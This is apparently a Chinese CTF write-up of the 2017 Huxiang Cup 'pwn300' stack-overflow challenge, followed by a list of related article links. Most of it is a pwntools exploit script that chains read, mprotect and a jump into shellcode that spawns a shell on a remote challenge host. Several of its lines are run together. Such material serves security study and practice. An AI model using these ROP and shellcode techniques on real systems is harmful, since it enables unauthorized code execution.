2017湖湘杯 pwn300

该题为简单栈溢出,利用方法如下:
(1)覆盖返回地址为read函数读入shellcode
(2)执行mprotect让bss段的地址变的可执行
(3)跳转shellcode执行即可

from pwn import *
context(os='linux',arch='x86',log_level='debug')io=remote("node3.buuoj.cn",29028)
#io=process("pwn300")
elf=ELF('pwn300')def add(value):io.sendlineafter("5 Save the result",'1')io.sendlineafter("input the integer x:",str(value-1))io.sendlineafter("input the integer y:",'1')bss_addr=0x80EB000
read=elf.symbols['read']
mprotect=elf.symbols['mprotect']
pop_eax=0x080bb406
jmp_eax=0x08048f02
pop_ebxesiedi=0x08048913
io.sendlineafter("How many times do you want to calculate:",'40')for i in range(16):add(0)add(read)
add(pop_ebxesiedi)
add(0)
add(bss_addr)
add(0x50)
add(mprotect)
add(pop_ebxesiedi)
add(bss_addr)
add(0x1000)
add(7)
add(pop_eax)
add(bss_addr)
add(jmp_eax)
io.sendlineafter("5 Save the result",'5')
sleep(0.2)
io.send(asm(shellcraft.sh()))
io.interactive()

2017湖湘杯 pwn300相关推荐

  1. 2017湖湘杯Writeup

    作者:LB919 出处:http://www.cnblogs.com/L1B0/ RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行up ...

  2. 2018湖湘杯海选复赛Writeup

    2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...

  3. 湖湘杯2019两个密码题wp

    湖湘杯2019两个密码题wp   还是自己太菜的原因,这次湖湘杯只做出来4道题,然后5点的时候就放弃了去跟同学出去玩了,当时感觉进前50无望(这次湖湘杯py情况也很严重啊,可惜烽火台只报不封,挺恶心的 ...

  4. 2019湖湘杯 misc3 之miscmisc

    ** 2019湖湘杯 misc3 之miscmisc* 明文攻击 关于LSB图片隐写的解法 word字符隐藏显示 zip加密文件破解 作为CTF小白,对于CTF一如既往的热爱,一个人报名了今年的湖湘杯 ...

  5. 2020湖湘杯 wp

    2020湖湘杯 wp web 题目名字不重要反正题挺简单的 NewWebsite misc misc2(题目名忘了.....) 总结 昨天打了下湖湘杯,签到选手上线. web 题目名字不重要反正题挺简 ...

  6. 2020湖湘杯部分writeup

    周末打了湖湘杯,把做题过程记录一下,大家交流学习. 下面的链接里有题目,可以下来看看. https://download.csdn.net/download/jameswhite2417/130819 ...

  7. 2021湖湘杯 Hideit Writeup

    2021湖湘杯 Hideit AAA : immortal 动态调试 直接x64dbg动调找到了关键的加密代码分别是xxtea 和 chacha20,直接动调从中拿出各种参数然后写代码进行解密.其实一 ...

  8. 2020湖湘杯-CTF-MISC-颜文字

    2020HXB-CTF-MISC-颜文字 颜文字 题目分析 开始 1.题目 2.流量分析 3.html分析 4.base64隐写 5.snow隐写 6.摩尔斯 结语 每天一题,只能多不能少 颜文字 题 ...

  9. 2020湖湘杯-CRYPTO-LFSRXOR

    2020HXB-CRYPTO-LFSRXOR LFSRXOR 题目分析 开始 1.题目 2.数学理论 3.回到题目 (1)源代码 (2)LFSR分析 (3)content原文分析 4.破解 5.get ...

最新文章

  1. 剑指offer:从尾到头打印链表
  2. reverse-for-the-holy-grail-350逆向寒假生涯(23/100)
  3. 长安大学二级c语言考试题,长安大学03-04C语言A卷试题
  4. pi数据库系统中国服务器,基于PI数据库的服务器实时监控系统研究与开发
  5. ORACLE RAC+DG 硬件配置
  6. UTF-8和BOM的一些说明
  7. Linq to Sql: 集成数据库语言查询之一
  8. 高质量C /C编程指南---第1章 文件机关
  9. maven坐标Dependencies和Exclusions详解
  10. B 树,B- 树,B+ 树,B* 树
  11. 十分钟倒计时flash_Flash 101-第6部分:最终倒计时
  12. 2021SC@SDUSC 量子加密库libqs
  13. 局域网查看工具V1.60.exe与局域网助手(LanHelper)的试用
  14. html页面字体美化,网页字体的美化-网页设计,HTML/CSS
  15. 博客什么的写也就写了
  16. 虾皮店铺优化有哪几个要点?
  17. 每周分享第 23 期
  18. 前端技术猜想-2018
  19. batchupdate写法_mybatis执行批量插入insert和批量更新update
  20. 决策树实现及调参的R与python方法对比——以泰坦尼克幸存者数据为例

热门文章

  1. 如何将PDF转换成Word效果最好
  2. mysql关键字 exists 与 in
  3. STM32中FLASH/System Memory/SRAM的区别
  4. 计算机的使用英语作文,关于电脑作用英语作文
  5. 爬取拉勾网,并进行数据分析
  6. 【Java案例】为新员工分配部门
  7. bat脚本学习(一)
  8. 加载Torchlight(火炬之光)的layout布局文件
  9. 家庭网络中的各种网络连接方式介绍及各自特点
  10. 自定义View——双色球彩票选号界面,模仿网易彩票